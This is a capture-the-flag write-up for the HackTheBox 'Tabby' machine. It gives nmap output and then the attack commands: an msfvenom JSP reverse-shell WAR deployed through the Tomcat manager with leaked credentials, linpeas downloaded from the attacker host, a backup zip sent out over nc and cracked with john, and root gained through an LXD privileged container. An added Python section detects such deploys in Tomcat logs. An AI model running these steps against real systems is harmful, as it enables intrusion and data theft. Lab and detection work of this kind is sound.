HackThebox: Tabby Writeup

Reconnaissance:

Let's start the recon with nmap.

# Nmap 7.91 scan initiated Sat Nov  7 20:03:51 2020 as: nmap -sC -sV -oN nmap.txt 10.10.10.194
Nmap scan report for 10.10.10.194
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 7 20:04:27 2020 -- 1 IP address (1 host up) scanned in 36.75 seconds
  • -sV: detect service version
  • Port 80: Apache
  • Port 8080: Tomcat
nano /etc/hosts
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.4  lport=1256 -f war -o shell.war
username="tomcat" password="$3cureP4s5w0rd123!"
curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/tabbyhack-shell'
python3 -c 'import pty; pty.spawn("/bin/sh")'
On the local (attacking) machine:
python -m SimpleHTTPServer 1226
On the target machine:
wget http://your_tunnel_ip:1226/linpeas.sh
On the target machine:
nc -w 3 10.10.14.125 4444<16162020_backup.zip
On the local (attacking) machine:
nc -l -p 4444 >16162020_backup.zip
sudo zip2john  16162020_backup.zip > hash
sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
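From the defender's side, the WAR deploy above leaves a distinctive trace in Tomcat's access log. The following Python is an added example, not part of the original writeup: it scans constructed sample access-log lines (Tomcat's default "common" pattern, which records the authenticated user) for successful deploy/upload requests to the manager application and then lists the first requests to the newly deployed context path.

```python
from __future__ import annotations
import re
import urllib.parse
from dataclasses import dataclass

# Constructed sample lines in Tomcat's default access-log pattern (not real log data).
SAMPLE_LOG = """\
10.10.14.4 - - [07/Nov/2020:20:05:11 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.4 - tomcat [07/Nov/2020:20:06:02 +0000] "PUT /manager/text/deploy?path=/tabbyhack-shell HTTP/1.1" 200 60
10.10.14.4 - - [07/Nov/2020:20:06:05 +0000] "GET /tabbyhack-shell/ HTTP/1.1" 200 0
192.168.1.20 - - [07/Nov/2020:20:07:30 +0000] "GET /index.html HTTP/1.1" 200 11156
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
# Text-manager (manager-script role) and HTML-manager deploy endpoints.
MANAGER_DEPLOY = re.compile(r'^/manager/(text|html)/(deploy|upload)\b')

@dataclass
class Finding:
    ip: str
    user: str
    ts: str
    path: str
    status: int

def find_manager_deploys(log_text: str) -> list[Finding]:
    """Return successful PUT/POST deploy or upload requests to the manager app."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m['method'] not in ('PUT', 'POST'):
            continue
        if MANAGER_DEPLOY.match(m['path']) and 200 <= int(m['status']) < 300:
            findings.append(Finding(m['ip'], m['user'], m['ts'], m['path'], int(m['status'])))
    return findings

def deployed_context(path: str) -> str | None:
    """Extract the context path from the deploy request's path= query parameter."""
    query = urllib.parse.urlsplit(path).query
    return urllib.parse.parse_qs(query).get('path', [None])[0]

def follow_up_requests(log_text: str) -> list[tuple[str, str]]:
    """Pair each newly deployed context with the client IPs that then requested it."""
    contexts = [c for f in find_manager_deploys(log_text) if (c := deployed_context(f.path))]
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for ctx in contexts:
            if m['path'] == ctx or m['path'].startswith(ctx + '/'):
                hits.append((ctx, m['ip']))
    return hits
```

A deploy by the manager user followed seconds later by the first request to a context that did not exist before is the sequence to alert on.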

GETTING USER ACCESS:-

John cracks the zip password:- admin@it

cat user.txt
b6658791046xxxxxxxxxxxxx (redacted)

GETTING ROOT ACCESS:-

As usual, start with the id command.

On the local (attacking) machine:
1. git clone https://github.com/saghul/lxd-alpine-builder.git
2. sudo ./build-alpine
This produces a tar.gz image, which you then transfer to the target machine.
On the target machine:-
* wget http://10.10.10.2:1326/alpine-v3.12-x86_64-20200823_2015.tar.gz
* cp alpine-v3.12-x86_64-20200823_2015.tar.gz /home/ash
* lxc image import ./alpine-v3.12-x86_64-20200823_2015.tar.gz --alias myimage
* lxc image list
* lxc init myimage ignite -c security.privileged=true
* lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
* lxc start ignite
* lxc exec ignite /bin/sh
cd /mnt/root
cd root
cat root.txt
